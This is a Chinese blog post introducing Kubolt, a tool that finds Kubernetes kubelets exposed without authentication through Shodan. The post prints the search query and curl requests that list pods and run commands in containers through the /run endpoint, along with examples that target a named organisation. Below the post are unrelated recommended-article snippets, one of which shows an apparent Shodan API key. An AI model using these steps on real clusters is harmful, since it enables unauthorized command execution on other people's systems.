可用于扫描开放Kubernetes集群的实用工具,Kubolt

最新推荐文章于 2024-04-25 09:44:39 发布
最新推荐文章于 2024-04-25 09:44:39 发布
阅读量168 收藏
点赞数

Kubolt是一款可以用来对公共未认证的Kubernetes集群进行安全扫描的实用工具,它允许我们直接在容器内运行控制命令。

某些情况下,Kubelet端口10250是开放的并接受未认证的访问请求,这样我们就可以使用kubelet的getrun函数来在容器内部执行操作命令了:

//getRun handles requests to run a command inside a container.

func(s *Server) getRun(request *restful.Request, response *restful.Response) {

       params := getExecRequestParams(request)

       pod, ok := s.host.GetPodByName(params.podNamespace,params.podName)

       if !ok {

        response.WriteError(http.StatusNotFound,fmt.Errorf("pod does not exist"))

              return

       }

运行机制及使用方式
基础请求示例:

ssl:trueport:10250 404

Kubelet默认使用SSL以及端口10250,其中的404指的是使用没有URL路径的HTTP响应。

Kubolt会通过Shodan API来请求获取一份IP地址列表,并保存下来以供后续公开资源情报调查活动的使用。

首先,我们可以运行Kubelet并过滤掉请求中不包含Unauthorized但包含container的主机,然后直接在容器内运行命令:

curl -k https://IP-from-Shodan:10250/runningpods/

当然了,你还可以利用下列请求获取所有可用的Pods:

curl-k https://IP-from-Shodan:10250/pods/


curlhttp://IP-from-Shodan:10255/pods/

接下来,Kubolt会对主机返回的响应信息进行解析,并生成如下所示的新请求:

curl -XPOST -khttps://IP-from-Shodan:10250/run/<namespace>/<PodName>/<containerName>-d "cmd=<command-to-run>"

你还可以使用如下Shodan过滤器来针对企业组织网络进行更加精准的安全扫描:

-asn

-org

-country

-net

工具安装

mkdir output

pip install -r requirements.txt

工具运行

python kubolt.py --query "asn:123123 org:'ACME Corporation'"
或

pythonkubolt.py --query "org:'ACME Corporation' country:UK"
Shodan

Kubolt使用了Shodan API以及相应的Query Credits,如果你在没有配置请求过滤器的情况下运行了该工具,那你有可能会触发你所有的Credits。

http://www.45zq.cn

TENCENTSYS
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
轻而易举:通过图形界面部署可用于生产的Kubernetes集群
01-31
易于运行:Breeze将您需要的所有资源(如kubernetes组件映像,用于kubernetes集群部署的ansible手册)组合到单个docker映像(wise2c / playbook)中。 它也可以用作本地RHEL / CentOS yum和Ubuntu apt存储库服务器...
探索KubiScan:自动化 Kubernetes 安全扫描工具
gitblog_00003的博客
03-26 384
探索KubiScan:自动化 Kubernetes 安全扫描工具 项目地址:https://gitcode.com/cyberark/KubiScan 项目简介 KubiScan 是 CyberArk 公司开源的一款强大而直观的工具,主要用于Kubernetes 集群进行安全审计和合规性检查。它通过扫描 Kubernetes 的配置文件、服务账户、角色绑定等关键元素,帮助用户发现潜在的安全风险...
K8s安全问题
weixin_45910629的博客
01-04 1368
在搭建k8s因为种种环境问题后,放弃了以前的方法,这回采用metarget靶场进行演示安装docker和k8s环境。
Kubernetes安全扫描kubescape
瓦罗兰特顶级C位的博客
03-27 1107
Kubescape 是第一个用于测试 Kubernetes 是否按照 NSA 和 CISA 的 Kubernetes 强化指南中定义的安全部署的工具 使用 Kubescape 测试集群扫描单个 YAML 文件并将其集成到您的流程中。
探索KubeSpider:一款强大的Kubernetes资源扫描工具
最新发布
gitblog_00060的博客
04-25 372
探索KubeSpider:一款强大的Kubernetes资源扫描工具 kubespiderA global resource download orchestration system, build your home download center. 项目地址:https://gitcode.com/gh_mirrors/ku/kubespider 项目简介 是一个开源项目,由OpenNASL...
【GitHub项目推荐--10个最佳开源Docker&Kubernetes安全扫描工具,提升容器安全性!】【转载】
j8267643的博客
04-03 1567
Docker容器的轻量、可移植和可扩展特性为应用程序的开发和交付带来了巨大的便利,特别是在微服务架构应用上,是许多开发者和组织的首选。其中,容器本身的安全往往容易容易被忽略,下面内容主要推荐一些对保护Kubernetes集群和Docker容器有用的开源工具,有助于Docker 镜像的静态扫描、安全审计、加固 Kubernetes 集群和实现运行时安全性。Docker使用的是C/S架构,作为服务端的Docker Daemon会接收客户端通过CLI或者REST API发送的命令,并执行对容器的相应操作。
使用Kubeadm工具快速安装Kubernetes集群.pdf
10-20
Kubeadm是Kubernetes官方提供的一个用于快速安装和管理Kubernetes集群的工具。通过本文档,读者可以快速地安装和配置Kubernetes集群,满足云原生计算和容器化应用的需求。 一、系统初始化 在开始安装Kubernetes...
Kubernetes集群部署
02-27
Kubernetes集群部署 Kubernetes集群部署是指将Kubernetes集群安装和配置到多台机器上,实现高可用性和负载均衡的分布式系统。...这些步骤是Kubernetes集群部署的基本组件,用于实现高可用性和负载均衡的分布式系统。
Submariner是一种用于连接不同Kubernetes集群的overlay网络的工具
12-18
Submariner是一种用于连接不同Kubernetes集群的overlay网络的工具。 Submariner 被设计为与网络插件 (CNI) 无关,并支持加密和 连接的集群之间的非加密隧道。Submariner 是一个云原生计算基金会沙盒项目
KubiScan:一种扫描Kubernetes集群以获取危险权限的工具
02-03
一种在Kubernetes的基于角色的访问控制(RBAC)授权模型中扫描Kubernetes群集以获取危险权限的工具。 该工具已作为“通过消除风险许可保护Kubernetes集群”研究的一部分发布, 。 总览 KubiScan帮助群集管理员确定...
kubernetes kubelet参数
全栈工程师开发手册(原创)https://github.com/tencentmusic/cube-studio
12-11 5982
概要 kubelet 是运行在每个节点上的主要的“节点代理”,每个节点都会启动kubelet进程,用来处理Master节点下发到本节点的任务,按照PodSpec描述来管理Pod和其中的容器(PodSpec 是用来描述一个 pod 的 YAML 或者 JSON 对象)。 kubelet 通过各种机制(主要通过 apiserver )获取一组 PodSpec 并保证在这些 PodSpec 中描述的容器...
集群scan_扫描k8s集群中的漏洞
weixin_29927289的博客
01-14 669
Kubei是一个漏洞扫描和CIS Docker基准测试工具,它能够对kubernetes集群进行准确,即时的风险评估。Kubei扫描Kubernetes集群中正在使用的所有图像,包括应用程序Pod和系统Pod的镜像。它不会扫描整个镜像注册表,也不需要与CI / CD进行初步集成。它是一种可配置的工具,可以定义扫描范围(目标名称空间),速度和关注的漏洞级别,还提供了图形用户界面。安装要求:...
使用kube-bench和kube-hunter扫描k8s集群
Nucleusx的专栏
11-04 2973
(1)kube-bench docker run --rm -v `pwd`:/host aquasec/kube-bench:latest install ./kube-bench master ./kube-bench node (2) kube-hunter yum install python3 pip3 install kube-hunter kube-hunter
二进制搭建kubernetes多master集群【四、配置k8s node】
weixin_30696427的博客
12-20 773
上一篇我们部署了kubernetes的master集群,参考:二进制搭建kubernetes多master集群【三、配置k8s master及高可用】 本文在以下主机上操作部署k8s node k8s-node1:192.168.80.10 k8s-node2:192.168.80.11 k8s-node3:192.168.80.12 以下kubeadm和kubectl命令操作都是在k8...
扫描docker安装的工具_两个开源工具,强化你的K8S安全!
weixin_39770821的博客
01-03 171
对于Kubernetes用户而言,安全永远是最受关注的话题。在谷歌/百度搜索“Kubernetes安全”,你会搜到大量的文章、博客等信息。Rancher也十分重视用户的安全问题。原因很简单:你需要使容器和Kubernetes安全与企业中现有的安全配置文件保持一致。在Kubernetes中有许多特性可以保证你的集群安全——身份验证和身份授权、etcd数据库中的secret和对象中的加密等等...
高可用Kubernetes集群-12. 部署kubernetes-ingress
qq_38695182的博客
01-15 1658
参考文档: Github:https://github.com/kubernetes/ingress-nginx Kubernetes ingress:https://kubernetes.io/docs/concepts/services-networking/ingress/ Ingress:https://mritd.me/2017/03/04/how-to-use-nginx-ing...
综合扫描 -- K8scan
weixin_41489908的博客
01-29 1062
你学不进的东西有人学,你不经历的有人经历,你吃不了的苦有人吃,想让人望而生畏,就要拿出常人百倍的野心去奋斗。。。 ---- 网易云热评 ​ 一、软件介绍 K8Cscan一款专用于大型内网渗透的高并发插件化扫描神器,包含信息收集、网络资产、漏洞扫描、密码爆破、漏洞利用,支持批量A段/B段/C段以及跨网段扫描。5.4版本内置28个功能模块,通过各种协议以及方法快速获取目标网络存活主机IP、计算机名、工作组、网络共享、网卡物理地址、操作系统版本、网站域名、Web中间件、路由器(Cisco)、数据库等网络.
信息搜集:网络空间搜索引擎(Shodan)语法及API应用案例
Liu_Bruce的博客
04-19 2258
信息搜集:网络空间搜索引擎(Shodan)语法及API应用案例 使用Python去调用Shodan的API接口可以实现自动化信息搜集,首先需要注册用户,在My Account中可以看到API Key。本例如下图: 初始化API: import shodan SHODAN_AIP_KEY = 'SXEuzFfIj612RyNE5NcOhTeAtNHznp4s' shodan_api = shodan.Shodan(SHODAN_AIP_KEY) 初始化API之后就可以使用Shodan的库函数,下面整理一
配置kubernetes UI图形化界面
weixin_30342827的博客
05-08 978
配置Kubernetes网络 在master和nodes上都需要安装flannel yum install flannel 在master和nodes上都需要配置flannel vi /etc/sysconfig/flanneld # Flanneld configuration options # etc...
手动部署 Kubernetes 集群指南
在本文档中,我们将逐步学习如何手动部署一个 Kubernetes 集群,而不是依赖自动化工具如 `kubeadm`。这个过程将涵盖各个组件的配置和启动参数,以帮助读者深入理解 Kubernetes 的工作原理和组件间的交互。 1. **...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值